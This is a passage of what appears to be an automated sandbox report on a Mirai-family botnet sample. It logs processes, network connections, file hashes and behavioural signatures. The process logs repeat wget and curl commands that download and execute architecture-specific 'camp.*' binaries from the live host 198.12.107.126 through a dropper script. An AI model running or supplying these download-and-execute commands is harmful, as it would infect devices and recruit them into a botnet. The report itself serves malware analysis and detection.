[wget http://198.12.107.126/bins/camp.mpsl]
/usr/bin/curl
[curl -O http://198.12.107.126/bins/camp.mpsl]
/bin/cat
[cat camp.mpsl]
/bin/chmod
[chmod +x busybox camp.arc camp.i686 camp.mips camp.mips64 camp.mpsl camp.x86 camp.x86_64 Chaotic ohshit.sh systemd-private-62296eb1a0ad45a38bb7146d93baeaea-systemd-timedated.service-WmNdZD]
/tmp/Chaotic
[./Chaotic]
/usr/bin/wget
[wget http://198.12.107.126/bins/camp.arm]
/usr/bin/curl
[curl -O http://198.12.107.126/bins/camp.arm]
/bin/cat
[cat camp.arm]
/bin/chmod
[chmod +x busybox camp.arc camp.arm camp.i686 camp.mips camp.mips64 camp.mpsl camp.x86 camp.x86_64 Chaotic ohshit.sh systemd-private-62296eb1a0ad45a38bb7146d93baeaea-systemd-timedated.service-WmNdZD]
/tmp/Chaotic
[./Chaotic]
/usr/bin/wget
[wget http://198.12.107.126/bins/camp.arm5]
/usr/bin/curl
[curl -O http://198.12.107.126/bins/camp.arm5]
/bin/cat
[cat camp.arm5]
/bin/chmod
[chmod +x busybox camp.arc camp.arm camp.arm5 camp.i686 camp.mips camp.mips64 camp.mpsl camp.x86 camp.x86_64 Chaotic ohshit.sh systemd-private-62296eb1a0ad45a38bb7146d93baeaea-systemd-timedated.service-WmNdZD]
/tmp/Chaotic
[./Chaotic]
/usr/bin/wget
[wget http://198.12.107.126/bins/camp.arm6]
/usr/bin/curl
[curl -O http://198.12.107.126/bins/camp.arm6]
/bin/cat
[cat camp.arm6]
/bin/chmod
[chmod +x busybox camp.arc camp.arm camp.arm5 camp.arm6 camp.i686 camp.mips camp.mips64 camp.mpsl camp.x86 camp.x86_64 Chaotic ohshit.sh systemd-private-62296eb1a0ad45a38bb7146d93baeaea-systemd-timedated.service-WmNdZD]
/tmp/Chaotic
[./Chaotic]
/usr/bin/wget
[wget http://198.12.107.126/bins/camp.arm7]
/usr/bin/curl
[curl -O http://198.12.107.126/bins/camp.arm7]
/bin/cat
[cat camp.arm7]
/bin/chmod
[chmod +x busybox camp.arc camp.arm camp.arm5 camp.arm6 camp.arm7 camp.i686 camp.mips camp.mips64 camp.mpsl camp.x86 camp.x86_64 Chaotic ohshit.sh systemd-private-62296eb1a0ad45a38bb7146d93baeaea-systemd-timedated.service-WmNdZD]
/tmp/Chaotic
[./Chaotic]
/usr/bin/wget
[wget http://198.12.107.126/bins/camp.ppc]
/usr/bin/curl
[curl -O http://198.12.107.126/bins/camp.ppc]
/bin/cat
[cat camp.ppc]
/bin/chmod
[chmod +x busybox camp.arc camp.arm camp.arm5 camp.arm6 camp.arm7 camp.i686 camp.mips camp.mips64 camp.mpsl camp.ppc camp.x86 camp.x86_64 Chaotic ohshit.sh]
/tmp/Chaotic
[./Chaotic]
/usr/bin/wget
[wget http://198.12.107.126/bins/camp.sparc]
/usr/bin/curl
[curl -O http://198.12.107.126/bins/camp.sparc]
/bin/cat
[cat camp.sparc]
/bin/chmod
[chmod +x busybox camp.arc camp.arm camp.arm5 camp.arm6 camp.arm7 camp.i686 camp.mips camp.mips64 camp.mpsl camp.ppc camp.sparc camp.x86 camp.x86_64 Chaotic ohshit.sh]
/tmp/Chaotic
[./Chaotic]
/usr/bin/wget
[wget http://198.12.107.126/bins/camp.m68k]
/usr/bin/curl
[curl -O http://198.12.107.126/bins/camp.m68k]
/bin/cat
[cat camp.m68k]
/bin/chmod
[chmod +x busybox camp.arc camp.arm camp.arm5 camp.arm6 camp.arm7 camp.i686 camp.m68k camp.mips camp.mips64 camp.mpsl camp.ppc camp.sparc camp.x86 camp.x86_64 Chaotic ohshit.sh]
/tmp/Chaotic
[./Chaotic]
/usr/bin/wget
[wget http://198.12.107.126/bins/camp.sh4]
/usr/bin/curl
[curl -O http://198.12.107.126/bins/camp.sh4]
/bin/cat
[cat camp.sh4]
/bin/chmod
[chmod +x busybox camp.arc camp.arm camp.arm5 camp.arm6 camp.arm7 camp.i686 camp.m68k camp.mips camp.mips64 camp.mpsl camp.ppc camp.sh4 camp.sparc camp.x86 camp.x86_64 Chaotic ohshit.sh]
/tmp/Chaotic
[./Chaotic]
Network
| Country | Destination | Domain | Proto |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:3778 | | tcp |
| US | 198.12.107.126:3778 | | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
Files
/tmp/busybox
| MD5 | a39fe8036e559ce804e26518061e59ff |
| SHA1 | 8df27f6e8a48b762d945ea2f2b87390c80acd4de |
| SHA256 | 3180df117342646dcdc4c436f95b41e15587e2238ec59064b4b06c065d56cf38 |
| SHA512 | e97756f316fceef7360e789362648529eea50eb6f7cc56cf654b3fc43ca61f0e4d9f366ed8fd59b73dd5a49615e935e9f53686d15f9a83c7fa472a70e7196d0d |
/tmp/camp.arc
| MD5 | 36a7a1e959eaf7d6896505777912ecdf |
| SHA1 | 4f9a1f8cc82036f0ffb90c6dc1c5093bca499919 |
| SHA256 | 5111947e9ff3b6280e4ba90b172bf864838492b0b48d640be41f51be427c44ca |
| SHA512 | 77acb1b88c40e0f91b4ec44216b3b49161a892f6bbca2cb09fe82be1ba7f5b469008f655b46473ba53734d2610863b98f97ac3a54475837867efc3e156bf2fb0 |
/tmp/Chaotic
| MD5 | dac9f1dcafdb77db0d0ff1be1e704b1e |
| SHA1 | e83605a050e0aaad3dba360545a00036f083eb91 |
| SHA256 | 7fd32ee1c25ade0f67fc93e797707d956ee74c36c44c93ea8e3f00a0085e938d |
| SHA512 | e2869500ed728e8a63947e541dc5c04edb9d581862715863334195d87f35c5207de8db7e23affe8113b2029ddbffd92364491e4291c53ecc4664fcc0244a0571 |
/tmp/Chaotic
| MD5 | 62e0ec59f989335be5fbf630a49da4ea |
| SHA1 | 43bdde1afd1089008539973b08e35dd66fb7451a |
| SHA256 | c3ae1058890bf151d5d464a608b68e2c377d4d31043e3883efb0d8a20685ab15 |
| SHA512 | ee8c5e36a0abc86c042630fcbd03f96459fe77cd8683498b77121c1a11befe59f72e3363989265317109f77df2d3c8633ccabc7e91581e3bdc363f29b8173b95 |
/tmp/Chaotic
| MD5 | 4c64afb0ad73da68d0e9dc8894d97f3a |
| SHA1 | 0d3f5938508079bf9dbbe13d75d7b91e21845312 |
| SHA256 | de175c508f1a56aa4fd47e0aa8103566c46508823bd8800a71e1f354fa18db2b |
| SHA512 | 7e65132191ca5f83ac7ce6b7d63a3423175d3ab893a859c1de37fd9d22f4fd4c76cfc163405ddc6c6c2910c31831a3c0a4f3b86fa68a241c40f328823050e107 |
/tmp/Chaotic
| MD5 | adfc93deaed5f946d896d185a7a3672f |
| SHA1 | 30686df1ec33ec8941a6bd5471292ec4dfdc7522 |
| SHA256 | 9ff7a99509c5186f028858692deb9b685bb196df414fad5822dec0f4efe90ccd |
| SHA512 | 94318e934aa23e1b9dfe4baa2dd1700986bea4343cf62bcac4c964876b42f70235260bc3ed4d367bf0501bfa334a5472a7307d258762cbf6d9c93b116263867f |
memory/816-1-0x00400000-0x0045af60-memory.dmp
/tmp/Chaotic
| MD5 | 69e35fed3302be73c0de271eae2690f7 |
| SHA1 | fdfb172bdcefc5f97d642c56e3771deffa0341c6 |
| SHA256 | 265c9eb70b9af05fc3e2cbeaf5a3505a76e5903b3e9286e70ba799c430f15981 |
| SHA512 | 1157694bf541b030139adfc760dacee62d39d45970d958a60177b1068320a9f3501971a7b745788f99024b757e81b4304b3ff7c1c4eeb76cd194c4f681db07f2 |
Analysis: behavioral4
Detonation Overview
Submitted
2024-11-09 08:32
Reported
2024-11-09 08:34
Platform
debian9-mipsel-20240418-en
Max time kernel
138s
Max time network
145s
Command Line
Signatures
Mirai
Mirai family
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/Chaotic | /tmp/Chaotic | N/A |
| N/A | /tmp/Chaotic | /tmp/Chaotic | N/A |
| N/A | /tmp/Chaotic | /tmp/Chaotic | N/A |
| N/A | /tmp/Chaotic | /tmp/Chaotic | N/A |
| N/A | /tmp/Chaotic | /tmp/Chaotic | N/A |
| N/A | /tmp/Chaotic | /tmp/Chaotic | N/A |
| N/A | /tmp/Chaotic | /tmp/Chaotic | N/A |
| N/A | /tmp/Chaotic | /tmp/Chaotic | N/A |
| N/A | /tmp/Chaotic | /tmp/Chaotic | N/A |
| N/A | /tmp/Chaotic | /tmp/Chaotic | N/A |
| N/A | /tmp/Chaotic | /tmp/Chaotic | N/A |
| N/A | /tmp/Chaotic | /tmp/Chaotic | N/A |
| N/A | /tmp/Chaotic | /tmp/Chaotic | N/A |
| N/A | /tmp/Chaotic | /tmp/Chaotic | N/A |
| N/A | /tmp/Chaotic | /tmp/Chaotic | N/A |
Modifies Watchdog functionality
| Description | Indicator | Process | Target |
| File opened for modification | /dev/watchdog | /tmp/Chaotic | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/Chaotic | N/A |
Enumerates running processes
Writes file to system bin folder
| Description | Indicator | Process | Target |
| File opened for modification | /sbin/watchdog | /tmp/Chaotic | N/A |
| File opened for modification | /bin/watchdog | /tmp/Chaotic | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/327/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/432/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/76/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/8/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/17/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/154/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/702/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/703/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/5/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/6/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/18/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/22/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/24/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/361/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/705/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/2/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/9/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/111/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/149/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/169/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/358/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/14/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/708/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/36/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/68/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/74/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/81/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/681/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/788/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/10/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/82/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/120/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/381/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/667/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/674/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/842/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/23/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/78/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/376/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/16/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/19/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/75/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/670/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/841/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/15/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/37/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/84/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/13/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/77/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/331/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/697/status | /tmp/Chaotic | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/cat | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/cat | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/camp.mips | /usr/bin/wget | N/A |
| File opened for modification | /tmp/camp.arm5 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/camp.arm5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/camp.arm6 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/camp.arm7 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/camp.i686 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/camp.arm7 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/camp.mips64 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/camp.ppc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/busybox | /bin/cp | N/A |
| File opened for modification | /tmp/camp.m68k | /usr/bin/curl | N/A |
| File opened for modification | /tmp/camp.sh4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/camp.arc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/camp.mpsl | /usr/bin/wget | N/A |
| File opened for modification | /tmp/camp.arm | /usr/bin/curl | N/A |
| File opened for modification | /tmp/camp.x86 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/camp.x86_64 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/camp.i686 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/camp.mpsl | /usr/bin/curl | N/A |
| File opened for modification | /tmp/camp.arc | /usr/bin/wget | N/A |
| File opened for modification | /tmp/camp.x86_64 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/camp.ppc | /usr/bin/wget | N/A |
| File opened for modification | /tmp/camp.sparc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/camp.x86 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/camp.mips | /usr/bin/curl | N/A |
| File opened for modification | /tmp/camp.arm | /usr/bin/wget | N/A |
| File opened for modification | /tmp/camp.arm6 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/camp.m68k | /usr/bin/wget | N/A |
| File opened for modification | /tmp/camp.sh4 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/Chaotic | /tmp/ohshit.sh | N/A |
Processes
/tmp/ohshit.sh
[/tmp/ohshit.sh]
/bin/cp
[cp /bin/busybox /tmp/]
/usr/bin/wget
[wget http://198.12.107.126/bins/camp.arc]
/usr/bin/curl
[curl -O http://198.12.107.126/bins/camp.arc]
/bin/cat
[cat camp.arc]
/bin/chmod
[chmod +x busybox camp.arc Chaotic ohshit.sh systemd-private-1cf8b6e8793e4fab844e6ddbaf438d0d-systemd-timedated.service-xf2Y29]
/tmp/Chaotic
[./Chaotic]
/usr/bin/wget
[wget http://198.12.107.126/bins/camp.x86]
/usr/bin/curl
[curl -O http://198.12.107.126/bins/camp.x86]
/bin/cat
[cat camp.x86]
/bin/chmod
[chmod +x busybox camp.arc camp.x86 Chaotic ohshit.sh systemd-private-1cf8b6e8793e4fab844e6ddbaf438d0d-systemd-timedated.service-xf2Y29]
/tmp/Chaotic
[./Chaotic]
/usr/bin/wget
[wget http://198.12.107.126/bins/camp.x86_64]
/usr/bin/curl
[curl -O http://198.12.107.126/bins/camp.x86_64]
/bin/cat
[cat camp.x86_64]
/bin/chmod
[chmod +x busybox camp.arc camp.x86 camp.x86_64 Chaotic ohshit.sh systemd-private-1cf8b6e8793e4fab844e6ddbaf438d0d-systemd-timedated.service-xf2Y29]
/tmp/Chaotic
[./Chaotic]
/usr/bin/wget
[wget http://198.12.107.126/bins/camp.i686]
/usr/bin/curl
[curl -O http://198.12.107.126/bins/camp.i686]
/bin/cat
[cat camp.i686]
/bin/chmod
[chmod +x busybox camp.arc camp.i686 camp.x86 camp.x86_64 Chaotic ohshit.sh systemd-private-1cf8b6e8793e4fab844e6ddbaf438d0d-systemd-timedated.service-xf2Y29]
/tmp/Chaotic
[./Chaotic]
/usr/bin/wget
[wget http://198.12.107.126/bins/camp.mips]
/usr/bin/curl
[curl -O http://198.12.107.126/bins/camp.mips]
/bin/cat
[cat camp.mips]
/bin/chmod
[chmod +x busybox camp.arc camp.i686 camp.mips camp.x86 camp.x86_64 Chaotic ohshit.sh systemd-private-1cf8b6e8793e4fab844e6ddbaf438d0d-systemd-timedated.service-xf2Y29]
/tmp/Chaotic
[./Chaotic]
/usr/bin/wget
[wget http://198.12.107.126/bins/camp.mips64]
/usr/bin/curl
[curl -O http://198.12.107.126/bins/camp.mips64]
/bin/cat
[cat camp.mips64]
/bin/chmod
[chmod +x busybox camp.arc camp.i686 camp.mips camp.mips64 camp.x86 camp.x86_64 Chaotic ohshit.sh systemd-private-1cf8b6e8793e4fab844e6ddbaf438d0d-systemd-timedated.service-xf2Y29]
/tmp/Chaotic
[./Chaotic]
/usr/bin/wget
[wget http://198.12.107.126/bins/camp.mpsl]
/usr/bin/curl
[curl -O http://198.12.107.126/bins/camp.mpsl]
/bin/cat
[cat camp.mpsl]
/bin/chmod
[chmod +x busybox camp.arc camp.i686 camp.mips camp.mips64 camp.mpsl camp.x86 camp.x86_64 Chaotic ohshit.sh systemd-private-1cf8b6e8793e4fab844e6ddbaf438d0d-systemd-timedated.service-xf2Y29]
/tmp/Chaotic
[./Chaotic]
/usr/bin/wget
[wget http://198.12.107.126/bins/camp.arm]
/usr/bin/curl
[curl -O http://198.12.107.126/bins/camp.arm]
/bin/cat
[cat camp.arm]
/bin/chmod
[chmod +x busybox camp.arc camp.arm camp.i686 camp.mips camp.mips64 camp.mpsl camp.x86 camp.x86_64 Chaotic ohshit.sh]
/tmp/Chaotic
[./Chaotic]
/usr/bin/wget
[wget http://198.12.107.126/bins/camp.arm5]
/usr/bin/curl
[curl -O http://198.12.107.126/bins/camp.arm5]
/bin/cat
[cat camp.arm5]
/bin/chmod
[chmod +x busybox camp.arc camp.arm camp.arm5 camp.i686 camp.mips camp.mips64 camp.mpsl camp.x86 camp.x86_64 Chaotic ohshit.sh]
/tmp/Chaotic
[./Chaotic]
/usr/bin/wget
[wget http://198.12.107.126/bins/camp.arm6]
/usr/bin/curl
[curl -O http://198.12.107.126/bins/camp.arm6]
/bin/cat
[cat camp.arm6]
/bin/chmod
[chmod +x busybox camp.arc camp.arm camp.arm5 camp.arm6 camp.i686 camp.mips camp.mips64 camp.mpsl camp.x86 camp.x86_64 Chaotic ohshit.sh]
/tmp/Chaotic
[./Chaotic]
/usr/bin/wget
[wget http://198.12.107.126/bins/camp.arm7]
/usr/bin/curl
[curl -O http://198.12.107.126/bins/camp.arm7]
/bin/cat
[cat camp.arm7]
/bin/chmod
[chmod +x busybox camp.arc camp.arm camp.arm5 camp.arm6 camp.arm7 camp.i686 camp.mips camp.mips64 camp.mpsl camp.x86 camp.x86_64 Chaotic ohshit.sh]
/tmp/Chaotic
[./Chaotic]
/usr/bin/wget
[wget http://198.12.107.126/bins/camp.ppc]
/usr/bin/curl
[curl -O http://198.12.107.126/bins/camp.ppc]
/bin/cat
[cat camp.ppc]
/bin/chmod
[chmod +x busybox camp.arc camp.arm camp.arm5 camp.arm6 camp.arm7 camp.i686 camp.mips camp.mips64 camp.mpsl camp.ppc camp.x86 camp.x86_64 Chaotic ohshit.sh]
/tmp/Chaotic
[./Chaotic]
/usr/bin/wget
[wget http://198.12.107.126/bins/camp.sparc]
/usr/bin/curl
[curl -O http://198.12.107.126/bins/camp.sparc]
/bin/cat
[cat camp.sparc]
/bin/chmod
[chmod +x busybox camp.arc camp.arm camp.arm5 camp.arm6 camp.arm7 camp.i686 camp.mips camp.mips64 camp.mpsl camp.ppc camp.sparc camp.x86 camp.x86_64 Chaotic ohshit.sh]
/tmp/Chaotic
[./Chaotic]
/usr/bin/wget
[wget http://198.12.107.126/bins/camp.m68k]
/usr/bin/curl
[curl -O http://198.12.107.126/bins/camp.m68k]
/bin/cat
[cat camp.m68k]
/bin/chmod
[chmod +x busybox camp.arc camp.arm camp.arm5 camp.arm6 camp.arm7 camp.i686 camp.m68k camp.mips camp.mips64 camp.mpsl camp.ppc camp.sparc camp.x86 camp.x86_64 Chaotic ohshit.sh]
/tmp/Chaotic
[./Chaotic]
/usr/bin/wget
[wget http://198.12.107.126/bins/camp.sh4]
/usr/bin/curl
[curl -O http://198.12.107.126/bins/camp.sh4]
/bin/cat
[cat camp.sh4]
/bin/chmod
[chmod +x busybox camp.arc camp.arm camp.arm5 camp.arm6 camp.arm7 camp.i686 camp.m68k camp.mips camp.mips64 camp.mpsl camp.ppc camp.sh4 camp.sparc camp.x86 camp.x86_64 Chaotic ohshit.sh]
/tmp/Chaotic
[./Chaotic]
Network
| Country | Destination | Domain | Proto |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:3778 | | tcp |
| US | 198.12.107.126:3778 | | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
Files
/tmp/busybox
| MD5 | 6ffc46165b5d9726a6607f3ea5305589 |
| SHA1 | ab127220f42e816b413dde0d17031e251a7bc98f |
| SHA256 | 80d636e2f1237e9adc9ea0bf7f42b17d7df8781db0684c33696411e50588a38c |
| SHA512 | 456fcd5d5bda524ef5236e00695a891cfefe15364f9c7a4ff04ad7dfdc7fd1726f037e905622216f13aee6c2d4ee90be0c850de82b3aac1d02a643db9f935af8 |
/tmp/camp.arc
| MD5 | 36a7a1e959eaf7d6896505777912ecdf |
| SHA1 | 4f9a1f8cc82036f0ffb90c6dc1c5093bca499919 |
| SHA256 | 5111947e9ff3b6280e4ba90b172bf864838492b0b48d640be41f51be427c44ca |
| SHA512 | 77acb1b88c40e0f91b4ec44216b3b49161a892f6bbca2cb09fe82be1ba7f5b469008f655b46473ba53734d2610863b98f97ac3a54475837867efc3e156bf2fb0 |
/tmp/Chaotic
| MD5 | dac9f1dcafdb77db0d0ff1be1e704b1e |
| SHA1 | e83605a050e0aaad3dba360545a00036f083eb91 |
| SHA256 | 7fd32ee1c25ade0f67fc93e797707d956ee74c36c44c93ea8e3f00a0085e938d |
| SHA512 | e2869500ed728e8a63947e541dc5c04edb9d581862715863334195d87f35c5207de8db7e23affe8113b2029ddbffd92364491e4291c53ecc4664fcc0244a0571 |
/tmp/Chaotic
| MD5 | 62e0ec59f989335be5fbf630a49da4ea |
| SHA1 | 43bdde1afd1089008539973b08e35dd66fb7451a |
| SHA256 | c3ae1058890bf151d5d464a608b68e2c377d4d31043e3883efb0d8a20685ab15 |
| SHA512 | ee8c5e36a0abc86c042630fcbd03f96459fe77cd8683498b77121c1a11befe59f72e3363989265317109f77df2d3c8633ccabc7e91581e3bdc363f29b8173b95 |
/tmp/Chaotic
| MD5 | 4c64afb0ad73da68d0e9dc8894d97f3a |
| SHA1 | 0d3f5938508079bf9dbbe13d75d7b91e21845312 |
| SHA256 | de175c508f1a56aa4fd47e0aa8103566c46508823bd8800a71e1f354fa18db2b |
| SHA512 | 7e65132191ca5f83ac7ce6b7d63a3423175d3ab893a859c1de37fd9d22f4fd4c76cfc163405ddc6c6c2910c31831a3c0a4f3b86fa68a241c40f328823050e107 |
/tmp/Chaotic
| MD5 | adfc93deaed5f946d896d185a7a3672f |
| SHA1 | 30686df1ec33ec8941a6bd5471292ec4dfdc7522 |
| SHA256 | 9ff7a99509c5186f028858692deb9b685bb196df414fad5822dec0f4efe90ccd |
| SHA512 | 94318e934aa23e1b9dfe4baa2dd1700986bea4343cf62bcac4c964876b42f70235260bc3ed4d367bf0501bfa334a5472a7307d258762cbf6d9c93b116263867f |
/tmp/Chaotic
| MD5 | 69e35fed3302be73c0de271eae2690f7 |
| SHA1 | fdfb172bdcefc5f97d642c56e3771deffa0341c6 |
| SHA256 | 265c9eb70b9af05fc3e2cbeaf5a3505a76e5903b3e9286e70ba799c430f15981 |
